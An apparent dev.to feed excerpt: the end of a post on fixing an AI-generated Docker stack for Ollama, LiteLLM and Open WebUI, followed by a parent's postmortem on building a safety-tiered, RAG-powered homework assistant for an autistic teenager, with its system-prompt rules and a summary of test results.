&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;litellm&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;environment&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;DATABASE_URL&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;postgresql://litellm:${POSTGRES_PASSWORD}@postgres:5432/litellm&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Open WebUI then correctly fell back to its own SQLite database. Any admin account created during the misconfiguration was lost (stored in the wrong DB), so a fresh account was needed after the fix. Minor, but worth knowing ahead of time.&lt;/p&gt;

&lt;p&gt;This pattern applies well outside this specific stack. Shared &lt;code&gt;.env&lt;/code&gt; files and service-specific secrets don't mix cleanly. Anything owned by one service should be set inline on that service.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Fix 4: Ollama Cloud &lt;code&gt;api_base&lt;/code&gt; was wrong.&lt;/strong&gt; LiteLLM's OpenAI provider appends &lt;code&gt;/chat/completions&lt;/code&gt; to whatever &lt;code&gt;api_base&lt;/code&gt; you give it. The path needs to already include &lt;code&gt;/v1&lt;/code&gt;. &lt;code&gt;https://ollama.com&lt;/code&gt; constructed &lt;code&gt;https://ollama.com/chat/completions&lt;/code&gt; — 404. &lt;code&gt;https://ollama.com/v1&lt;/code&gt; constructed &lt;code&gt;https://ollama.com/v1/chat/completions&lt;/code&gt; — 200. One path component, all Ollama Cloud calls failing.&lt;/p&gt;
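&lt;p&gt;In LiteLLM config terms, the working shape looks roughly like this; the model name and key variable are placeholders:&lt;/p&gt;

```yaml
model_list:
  - model_name: ollama-cloud-llama        # placeholder alias
    litellm_params:
      model: openai/llama3.2              # routed via the OpenAI-compatible provider
      api_base: https://ollama.com/v1     # /v1 included, so /chat/completions appends correctly
      api_key: os.environ/OLLAMA_CLOUD_API_KEY
```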

&lt;p&gt;&lt;strong&gt;Fix 5: Ollama is in Docker. Its CLI is too.&lt;/strong&gt; I ran &lt;code&gt;ollama pull llama3.2&lt;/code&gt; on the host and got command not found. The binary isn't on the host. All Ollama operations in a Dockerized install go through &lt;code&gt;docker exec&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker &lt;span class="nb"&gt;exec&lt;/span&gt; &lt;span class="nt"&gt;-it&lt;/span&gt; ollama ollama pull llama3.2
docker &lt;span class="nb"&gt;exec &lt;/span&gt;ollama ollama list
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No functional impact. Just the kind of thing you forget in the moment.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Part That Stuck With Me
&lt;/h2&gt;

&lt;p&gt;Prompt quality determines output quality, full stop. The reason this went as well as it did is that the prompt was thorough. Gaps in the prompt become gaps in the output. That's not a Claude Code-specific observation, it's just how agentic automation works — same as writing a runbook for a junior tech. Vague instructions, vague results.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;env_file&lt;/code&gt; scope thing is the most broadly useful takeaway from this whole experiment, because it has nothing to do with AI-generated configs specifically. It's Docker behavior that bites people in hand-written compose files too.&lt;/p&gt;

&lt;p&gt;And honestly? 90% correct on first autonomous run for a four-service stack with network isolation, secrets management, and firewall configuration is a result I'd take. The five fixes were configuration details. Nothing had to be rebuilt. The services came up, the network worked, the firewall was sane.&lt;/p&gt;

&lt;p&gt;For a CPU-only dev environment on a clean VM, that's a solid starting point.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Stack: Ollama + LiteLLM + Open WebUI + PostgreSQL | Docker Compose | Ubuntu Server 24.04 | VMware ESXi 8&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>webdev</category>
      <category>programming</category>
      <category>productivity</category>
    </item>
    <item>
      <title>I Built a Guardrailed, RAG-Powered AI Workspace for My Autistic Teenager. Here's What Actually Broke.</title>
      <dc:creator>Kerry Kier</dc:creator>
      <pubDate>Sat, 25 Apr 2026 21:37:12 +0000</pubDate>
      <link>https://dev.to/kkierii/i-built-a-guardrailed-rag-powered-ai-workspace-for-my-autistic-teenager-heres-what-actually-16an</link>
      <guid>https://dev.to/kkierii/i-built-a-guardrailed-rag-powered-ai-workspace-for-my-autistic-teenager-heres-what-actually-16an</guid>
      <description>&lt;p&gt;My daughter is 13 and autistic. She needs homework help at 9pm sometimes. Every AI tool I looked at was either totally unmonitored, pointed at the open internet, or locked behind a school district policy I had zero visibility into.&lt;/p&gt;

&lt;p&gt;I'm an IT admin. I run a homelab. I have an RTX 3060 sitting there. So I built something myself.&lt;/p&gt;

&lt;p&gt;This isn't a tutorial. It's a postmortem of everything that failed and what I did to fix it — because the gap between "I have a working Ollama instance" and "this is actually safe for a vulnerable kid" is a lot wider than I expected.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Stack
&lt;/h2&gt;

&lt;p&gt;Nothing exotic here:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Ubuntu Server 24.04&lt;/strong&gt; on local hardware&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ollama&lt;/strong&gt; for model serving&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;LiteLLM 1.68.2&lt;/strong&gt; as the LLM proxy&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Open WebUI 0.8.12&lt;/strong&gt; as the front end&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;TEI reranker container&lt;/strong&gt; for RAG reranking&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PostgreSQL&lt;/strong&gt; for persistent storage&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;RTX 3060 12GB&lt;/strong&gt; doing the inference&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Getting this running took an afternoon. Getting it to actually behave correctly for a neurodivergent 13-year-old took weeks.&lt;/p&gt;




&lt;h2&gt;
  
  
  Failure 1: The System Prompt Isn't Just Instructions
&lt;/h2&gt;

&lt;p&gt;I came in thinking I understood system prompts. I didn't — not for this use case.&lt;/p&gt;

&lt;p&gt;The hardest part was safety escalation. I needed the assistant to respond differently to three distinct situations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Tier 1:&lt;/strong&gt; Stress and frustration. &lt;code&gt;"I hate this homework"&lt;/code&gt; → calm acknowledgment, one small next step, no alarm.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tier 2:&lt;/strong&gt; Ambiguous language that &lt;em&gt;might&lt;/em&gt; suggest self-harm. &lt;code&gt;"I just want to disappear"&lt;/code&gt; → specific required phrases, 988 crisis line, tell a trusted adult.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tier 3:&lt;/strong&gt; Explicit crisis disclosure. &lt;code&gt;"I want to hurt myself"&lt;/code&gt; → stop everything, full escalation, all four required phrases, crisis resources.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;My first implementation shared a single phrase list across Tier 2 and Tier 3. The model couldn't reliably tell them apart. It kept firing Tier 3 language at Tier 2 inputs.&lt;/p&gt;

&lt;p&gt;That matters. Over-escalating to a kid who said "I wish I wasn't here" while frustrated about a math test is its own kind of harm. It can cause panic. It can erode trust. It can make them less likely to say anything at all next time.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; Split everything into tier-specific blocks. Added concrete anchoring examples inside each tier definition. Added an explicit pre-response decision rule:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Before responding to any distress signal, identify the correct tier first.
Do not use Tier 3 language for Tier 2 signals.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Simple in retrospect. Not obvious until you've watched it fail a few times.&lt;/p&gt;
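&lt;p&gt;Prompt-side enforcement is what fixed it here, but the same decision rule can also be backed by a deterministic pre-filter in front of the model. A sketch with stand-in phrase lists, not the production ones, and not a substitute for the full safety design:&lt;/p&gt;

```python
# Deterministic pre-classifier for the tier decision rule. The phrase
# lists are illustrative stand-ins; this backs up the system prompt
# rather than replacing it.
TIER3_PHRASES = ["want to hurt myself", "want to die", "kill myself"]
TIER2_PHRASES = ["want to disappear", "wish i wasn't here", "no point anymore"]

def classify_tier(message):
    text = message.lower()
    if any(p in text for p in TIER3_PHRASES):
        return 3  # explicit crisis: stop everything, full escalation
    if any(p in text for p in TIER2_PHRASES):
        return 2  # ambiguous: crisis resources, trusted adult, no Tier 3 language
    return 1      # stress/frustration: calm acknowledgment, one small next step
```

&lt;p&gt;Even a crude filter like this gives you a hard floor: Tier 3 phrases can never be silently downgraded, whatever the model decides.&lt;/p&gt;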




&lt;h2&gt;
  
  
  Failure 2: RAG Retrieval Wasn't Doing What I Thought
&lt;/h2&gt;

&lt;p&gt;I built a knowledge base of 34 support documents: study habits, math steps, overwhelm strategies, emotional support, writing frameworks, autism-specific anchors for executive function and stress shutdown.&lt;/p&gt;

&lt;p&gt;Uploaded them. Ran a test. The model pulled a research standards document instead of the overwhelm support guide.&lt;/p&gt;

&lt;p&gt;The problem: my short support docs (200–400 words each) were being semantically outcompeted by longer, denser reference documents during retrieval scoring. Embeddings don't care which document is "right." They care about similarity, and a thin support guide loses to a 1,500-word standards reference almost every time.&lt;/p&gt;

&lt;p&gt;I tried chunking adjustments first:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;chunk_size&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;300 → &lt;/span&gt;&lt;span class="m"&gt;800&lt;/span&gt;
&lt;span class="na"&gt;overlap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;50 → &lt;/span&gt;&lt;span class="m"&gt;100&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Helped marginally. Didn't fix it. The root cause was semantic density mismatch, not chunking.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The real fix:&lt;/strong&gt; Rewrote all 29 general support documents to be longer and richer. Added a Common Core connection section to each one — deliberately mirroring the vocabulary of the dense anchor documents so the support docs could compete in retrieval scoring. Three hours of rewriting. After that, retrieval started hitting the right documents consistently.&lt;/p&gt;




&lt;h2&gt;
  
  
  Failure 3: "One Step at a Time" Wasn't Enforced Enough
&lt;/h2&gt;

&lt;p&gt;The system prompt said: give distressed users one step at a time. What the model actually did was give one step, then append a "Remember:" block, or a "Tips:" section, or an "If you get stuck:" coda.&lt;/p&gt;

&lt;p&gt;Technically compliant with the letter of the rule, but not its spirit. For a kid who's already overwhelmed, that extra content is precisely the problem we were trying to solve.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; Added an explicit forbidden behaviors section:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Do not add extra sections such as "if you get stuck," "tips," 
"remember," or "extra help" unless the knowledge base pattern 
includes them or the user explicitly asks.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After that, instruction compliance tests passed consistently.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Test Protocol
&lt;/h2&gt;

&lt;p&gt;Before my daughter ever touched it, I ran a structured red team evaluation across four categories:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Category&lt;/th&gt;
&lt;th&gt;Tests&lt;/th&gt;
&lt;th&gt;Pass&lt;/th&gt;
&lt;th&gt;Partial&lt;/th&gt;
&lt;th&gt;Fail&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Safety&lt;/td&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RAG accuracy&lt;/td&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Boundary enforcement&lt;/td&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Instruction compliance&lt;/td&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;40&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;29&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;7&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;4&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Five escalation levels per category, from benign baseline probes up to combination attacks that blended two failure types in a single message. All four failures were remediated before deployment.&lt;/p&gt;
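If you log each probe as a (category, outcome) pair, the table above is just an aggregation. A small sketch of the tally — the category keys here are shorthand, not the exact labels from my test record:

```python
from collections import Counter

def summarize(results):
    """Tally pass/partial/fail per category from (category, outcome) pairs."""
    table = {}
    for category, outcome in results:
        table.setdefault(category, Counter())[outcome] += 1
    return table

# The run above, re-encoded as one entry per probe.
results = (
    [("safety", "pass")] * 8 + [("safety", "partial")] + [("safety", "fail")]
    + [("rag", "pass")] * 6 + [("rag", "partial")] * 3 + [("rag", "fail")]
    + [("boundary", "pass")] * 9 + [("boundary", "partial")]
    + [("compliance", "pass")] * 6 + [("compliance", "partial")] * 2
    + [("compliance", "fail")] * 2
)
summary = summarize(results)
print(sum(c["pass"] for c in summary.values()))  # 29
```

Keeping the raw outcomes rather than just the totals means a prompt change can be re-scored per category without rerunning probes that didn't change.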

&lt;p&gt;The one open partial: a fallback scenario where a secondary example surfaces after the primary one. Low priority. On the list.&lt;/p&gt;




&lt;h2&gt;
  
  
  What I'd Do Differently
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Start with requirements, not model selection.&lt;/strong&gt; I wasted a week comparing models before I understood that prompt quality and knowledge base structure matter more than model choice for a constrained use case like this. A well-prompted smaller model will outperform a poorly prompted frontier model here.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Write the system prompt like a contract.&lt;/strong&gt; Every ambiguity gets exploited — not maliciously, but by the model doing its best to be helpful in unexpected ways. Specify exact required phrases. Specify forbidden response structures. Be concrete.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Test adversarially before anyone uses it.&lt;/strong&gt; Especially for anything touching a minor's mental health. "Seems fine" isn't a standard.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Semantic density matters in RAG.&lt;/strong&gt; If your support documents are short and your reference documents are long, your support documents will lose at retrieval time. Either bulk them up or architect separate collections.&lt;/p&gt;
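The separate-collections option can be sketched as: query each collection independently and merge with an explicit priority, so a matching support guide always surfaces even when a dense reference would outscore it in a single pool. Everything here — class names, vectors, the merge rule — is illustrative, not my actual setup:

```python
import numpy as np

def cosine(a, b):
    return float(np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b)))

class Collection:
    """Tiny in-memory stand-in for one vector-store collection."""
    def __init__(self, docs):
        self.docs = docs  # {doc_id: embedding vector}

    def search(self, query, k):
        hits = sorted(((d, cosine(query, v)) for d, v in self.docs.items()),
                      key=lambda kv: kv[1], reverse=True)
        return hits[:k]

def retrieve(query, support, reference, k=3):
    # Query each collection separately so thin support guides never
    # compete with dense reference docs inside a single ranking;
    # the best support hit is always placed first.
    return support.search(query, 1) + reference.search(query, k - 1)

support = Collection({"overwhelm_guide": np.array([0.9, 0.1])})
reference = Collection({"standards_ref": np.array([1.0, 0.3])})
top_doc, _ = retrieve(np.array([1.0, 0.2]), support, reference)[0]
print(top_doc)  # overwhelm_guide
```

The trade-off versus bulking up the documents is that the priority rule is now hardcoded; I chose rewriting instead because I wanted one ranking the model could reason about.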




&lt;h2&gt;
  
  
  Where It Stands
&lt;/h2&gt;

&lt;p&gt;The workspace is live. Safety escalation is solid. RAG retrieval is accurate across all tested scenarios. Boundary enforcement holds.&lt;/p&gt;

&lt;p&gt;My daughter hasn't broken it yet. That's the benchmark that actually matters.&lt;/p&gt;

&lt;p&gt;The full writeup with more detail on the RAG architecture, the rewriter script, and the complete test record is on my Hashnode — link in the comments.&lt;/p&gt;




&lt;p&gt;Has anyone else built guardrailed AI tooling for a specific vulnerable user population? I'd genuinely like to compare notes — especially on the RAG side. I suspect the density mismatch problem is more common than people realize and I haven't seen much written about it.&lt;/p&gt;




</description>
      <category>ai</category>
      <category>devops</category>
      <category>beginners</category>
      <category>machinelearning</category>
    </item>
  </channel>
</rss>
